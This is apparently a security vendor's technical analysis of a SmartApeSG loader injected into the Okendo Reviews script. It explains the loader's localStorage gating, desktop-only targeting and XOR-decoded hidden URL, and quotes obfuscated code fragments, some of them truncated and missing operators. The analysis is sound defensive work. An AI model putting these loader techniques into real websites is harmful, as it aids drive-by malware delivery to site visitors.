Technical Analysis

SmartApeSG (also tracked as ZPHP or HANEYMANEY) has been associated in prior campaigns that led to the deployment of malware families such as NetSupport RAT, Remcos RAT, StealC, and Sectop RAT.

In this incident, the SmartApeSG injected JavaScript behaved as a staged loader, and did not attempt to execute every action immediately. Instead, the JavaScript focused on control, reconstruction, and retrieval which reduced the visibility of the script and gave the operator more flexibility. A portion of the malicious JS is shown in the figure below:

Figure 1: Malicious SmartApeSG JavaScript code injected into the Okendo Reviews script.

At a high level, the SmartApeSG loader workflow includes the stages shown in the figure below:

Figure 2: SmartApeSG loader workflow overview. 

Execution control and target filtering (localStorage)

To suppress repeated execution, the script implements browser-side state tracking using localStorage. On first execution, the code writes a timestamp marker. Subsequent visits can be short-circuited based on that stored value, which reduces noisy repeat behavior and lowers the chance of casual observation during testing.

The script also applies User-Agent filtering. In the samples we analyzed, the checks biased execution toward desktop environments and excluded mobile devices. This is consistent with later-stage ClickFix workflows, which are typically optimized for desktop interaction patterns and follow-on tooling.

The following example shows the script using localStorage to track prior execution and the User-Agent checks for mobile browsers.

 function _0x32dfc8() {
       const _0x26256c = _0xd28549;
       const _0x490d08 = localStorage['getItem'](_0x4a5293);
       if (!_0x490d08) {
           localStorage['setItem'](_0x4a5293, Date['now']()[_0x26256c(0xde)]());
           return ![];
  function _0x4e7869() {
       return /Android|iPhone/i ['test'](navigator['userAgent']);
   }

Deobfuscation and dynamic infrastructure construction

After the environment checks are complete, the loader reconstructs the next-stage delivery path. The infrastructure is not stored in cleartext. Instead, the destination is split into encoded fragments designed to complicate static inspection and evade basic signature approaches.

During execution, the script applies an XOR-based decoding routine to rebuild the hidden path. It also generates a randomized 8-character token and dynamically inserts a new <script> element into the page to retrieve follow-on content.

The following example shows the loader decoding XOR-obfuscated string fragments to reconstruct the hidden next-stage URL.

function __getHiddenURL() {
   const _0x59daee = _0x3b1d;
   const _0x4e7e48 = _0x59daee(0xd9);
   const _0x5c29df = ['1f044640', '044a1d1f', '16005b1e', '0019484a', _0x59daee(0xe4), _0x59daee(0xe6), '141f5f1f', '141c5359', '1a031d43', '141f4255', _0x59daee(0xd4), '121d531e', '0718420f'];
   let _0x5c798a = '';
   for (let _0xb3288f = 0x0; _0xb3288f_0x5c29df['length']; _0xb3288f++) {
       let _0x5d86c7 = _0x5c29df[_0xb3288f];
       let _0x22ea90 = '';
       for (let _0x3ba209 = 0x0; _0x3ba209_0x5d86c7['length']; _0x3ba209 += 0x2) {
           const _0x9daa62 = parseInt(_0x5d86c7['substr'](_0x3ba209, 0x2), 0x10);
           _0x22ea90 += String['fromCharCode'](_0x9daa62 ^ _0x4e7e48[_0x59daee(0xe0)](_0x3ba209 / 0x2 % _0x4e7e48['length']));
       }
       _0x5c798a += _0x22ea90;
   }
   return _0x5c798a;

The structure and execution model we observed align with previously documented SmartApeSG campaigns. 

The SmartApeSG infection chain will typically go on to perform the following actions: 

• Display a fake CAPTCHA or verification prompt.
• Present instructions for the user to run copied commands via the Windows Run menu.
• Retrieve PowerShell or HTML Application (HTA) downloaders.
• Deploy remote access tools or information stealers.